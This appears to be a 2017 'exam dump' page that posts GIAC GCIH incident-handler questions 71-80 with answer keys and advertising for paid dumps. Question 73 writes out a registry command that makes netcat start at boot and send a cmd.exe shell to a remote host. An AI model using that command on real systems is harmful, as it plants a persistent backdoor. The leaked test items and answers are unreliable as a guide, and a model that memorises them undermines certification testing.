[Free] 2017(Sep) CollectDumps Dumpsleader GIAC GCIH Dumps with VCE and PDF 71-80

CollectDumps 2017 Sep GIAC Official New Released GCIH
100% Free Download! 100% Pass Guaranteed!
http://www.CollectDumps.com/GCIH.html

GIAC Certified Incident Handler

Question No: 71 – (Topic 1)

Which of the following methods can be used to detect session hijacking attack?

  1. nmap

  2. Brutus

  3. ntop

  4. sniffer

Answer: D

Question No: 72 – (Topic 1)

Which of the following functions can you use to mitigate a command injection attack? Each correct answer represents a part of the solution. Choose all that apply.

  1. escapeshellarg()

  2. escapeshellcmd()

  3. htmlentities()

  4. strip_tags()

Answer: A,B

Question No: 73 – (Topic 1)

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ

/d quot;c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exequot;

What task do you want to perform by running this command?

Each correct answer represents a complete solution. Choose all that apply.

  1. You want to perform banner grabbing.

  2. You want to set the Netcat to execute command any time.

  3. You want to put Netcat in the stealth mode.

  4. You want to add the Netcat command to the Windows registry.

Answer: B,C,D

Question No: 74 – (Topic 1)

Which of the following Incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an enterprise?

  1. Preparation phase

  2. Eradication phase

  3. Identification phase

  4. Recovery phase

  5. Containment phase

Answer: A

Question No: 75 CORRECT TEXT – (Topic 1)

Fill in the blank with the appropriate term.

is the practice of monitoring and potentially restricting the flow of information outbound from one network to another

Answer: Egress filtering

Question No: 76 – (Topic 1)

You work as a Network Administrator for InformSec Inc. You find that the TCP port number 23476 is open on your server. You suspect that there may be a Trojan named Donald Dick installed on your server. Now you want to verify whether Donald Dick is installed on it or not. For this, you want to know the process running on port 23476, as well as the process id, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task?

  1. Tripwire

  2. SubSeven

  3. Netstat

  4. Fport

Answer: D

Question No: 77 – (Topic 1)

Who are the primary victims of smurf attacks on the contemporary Internet system?

  1. IRC servers are the primary victims to smurf attacks

  2. FTP servers are the primary victims to smurf attacks

  3. SMTP servers are the primary victims to smurf attacks

  4. Mail servers are the primary victims to smurf attacks

Answer: A

Question No: 78 – (Topic 1)

Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?

  1. Piggybacking

  2. Hacking

  3. Session hijacking

  4. Keystroke logging

Answer: C

Question No: 79 – (Topic 1)

You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure.com Web site. For this, you want to perform the idle scan so that you can get the ports open in the we-are-secure.com server. You are using Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless whether the ports are open or close.

Sometimes, IPID is being incremented by more than one value. What may be the reason?

  1. The firewall is blocking the scanning process.

  2. The zombie computer is not connected to the we-are-secure.com Web server.

  3. The zombie computer is the system interacting with some other system besides your computer.

  4. Hping does not perform idle scanning.

Answer: C

Question No: 80 – (Topic 1)

Which of the following commands can be used for port scanning?

  1. nc -t

  2. nc -z

  3. nc -w

  4. nc -g

Answer: B

100% Free Download!
Download Free Demo:GCIH Demo PDF
100% Pass Guaranteed!
Download 2017 CollectDumps GCIH Full Exam PDF and VCE

CollectDumps ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

2017 CollectDumps IT Certification PDF and VCE